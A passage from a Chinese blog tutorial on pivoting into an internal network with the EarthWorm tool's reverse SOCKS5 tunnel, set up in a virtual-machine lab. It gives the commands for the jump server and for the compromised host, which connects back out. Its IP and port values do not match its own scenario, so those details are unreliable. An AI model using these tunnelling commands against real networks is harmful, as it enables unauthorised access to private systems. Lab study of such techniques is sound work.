EW实现socks5代理进行内网渗透(二)

场景2(这里所有主机都是虚拟机)

攻击者连接跳板机,内网跳板反弹连接到跳板机,内网跳板连接内网目标主机

场景描述:攻击者(192.168.1.10)位于外网,无法访问目标网络内部的主机。但是攻击者可以访问目标网络中对外暴露的服务器(192.168.1.34)。在目标网络中还有一台机器是被控制的,IP地址网卡一:192.168.1.22,IP地址网卡二:192.168.200.22,这台机器可以反弹连接到跳板机。

攻击链路:攻击者首先连接到跳板机,再连接到内网跳板,最后访问内网的目标机器(192.168.200.20··)。

由于网络转换问题,内网跳板机不能是NAT模式,而是使用桥接模式,只要内网跳板能访问到内网目标即可说明问题。

通过VM虚拟化软件实现场景搭建,网络模式和IP地址配置如下:
在这里插入图片描述

(1)跳板机上的操作

./ew -s rcsocks -l 6000 -e 7000  

//添加转发隧道,将6000端口收到的代理请求转发给反连7000端口的主机

在这里插入图片描述

(2)内网跳板操作

.\ew -s rssocks -d 192.168.1.8 -e 8888 

//内网跳板反弹连接到跳板机的8888端口
在这里插入图片描述
(3)攻击机器本机通过Proxifier或浏览器设置Socks5代理访问目标内网服务
方法一:Proxifier设置Socks5代理
在这里插入图片描述
在这里插入图片描述

此时就可以通过攻击机(win10)的浏览器访问到目标内网的web服务了

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值